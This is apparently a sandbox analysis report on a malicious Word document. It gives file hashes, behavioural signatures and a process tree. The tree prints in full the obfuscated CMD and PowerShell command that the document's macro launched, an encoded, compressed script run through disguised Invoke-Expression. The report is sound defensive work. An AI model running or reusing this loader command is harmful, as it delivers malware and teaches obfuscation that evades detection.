Overview

overview

10

Static

static

8

9225e38cb2...18.doc

windows7-x64

10

9225e38cb2...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 14:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9225e38cb2ac8cc72f65d862e5dd7003_JaffaCakes118.doc

  • Size

    75KB

  • MD5

    9225e38cb2ac8cc72f65d862e5dd7003

  • SHA1

    ec6e48118f62f5e4c9322bab9b6bf5a36a336751

  • SHA256

    dda6fd8390483974892ef7423b44d74f843e32cfa3d15716fc8a5d554075b892

  • SHA512

    c0ab7843d9353718a8a44a71883b988e12f351427f28c5705d24481875dfc2dd90d847f4881e1b1b66359c525501429c22488cc908cd711c284f7ea13077343a

  • SSDEEP

    768:sTBSVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9tcD2tAcnBnip:s9Socn1kp59gxBK85fBt+a9rPB

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9225e38cb2ac8cc72f65d862e5dd7003_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3028
      • C:\Windows\SysWOW64\CMD.exe
        CMD cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF7VSnZxDofQKyI6RxKUEhJ93mENECsV6EoUWA0qJJZF4gKKlyJnQV2nV8NcuHp21bJ2ZgUQqmAMNV9Tb7D08msWBcVQJcEx6e0DT23BhmmnCW5QUcuycQ0ioQ2lbgMu24kqVujrJ9XUqc0CX1OVntOy/y6Ot8TjnZfX1EBNRtgVDVAf2mwcgDyuAHKD9pA4koJuT9GntSeeONfo/mtyfuF2ytW1XqJNvIEu6eF28M9PlW3fQFplsXeld46nIufBAJiqIfhj8=' ),[io.COMpResSIoN.cOmPRessiONmOde]::deComprEsS ) ^|FOreacH{NEW-objEcT iO.sTreAMREaDer($_ , [TExt.enCoDING]::ASCIi ) }).READtOENd() ^| . ( ([StRiNG]$veRBOsEprEFerenCE)[1,3]+'X'-joiN'')&& pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2172
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2640

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      13f93f674155ec402e7fa91d08473449

      SHA1

      13f293ac5f1e0cdc54a10100c0b2d3acb5edcc9d

      SHA256

      99a528203a234193d7d1cabead1737b6c48da62900525ec504ab7c1b2d7e1271

      SHA512

      9df23250f4be534f8890701ee2df486400dc49e7711601a33fc5b6afa8a662f8dfeac23d699e8a6635bff072b67250306d2a8f5eaa36c759091b1a0163b683fd

      Download Submit

    • memory/2256-0-0x000000002F761000-0x000000002F762000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2256-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2256-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2256-6-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2256-7-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2256-8-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2256-16-0x00000000711DD000-0x00000000711E8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2256-17-0x0000000000710000-0x0000000000810000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2256-32-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2256-33-0x00000000711DD000-0x00000000711E8000-memory.dmp

      Filesize

      44KB

      Download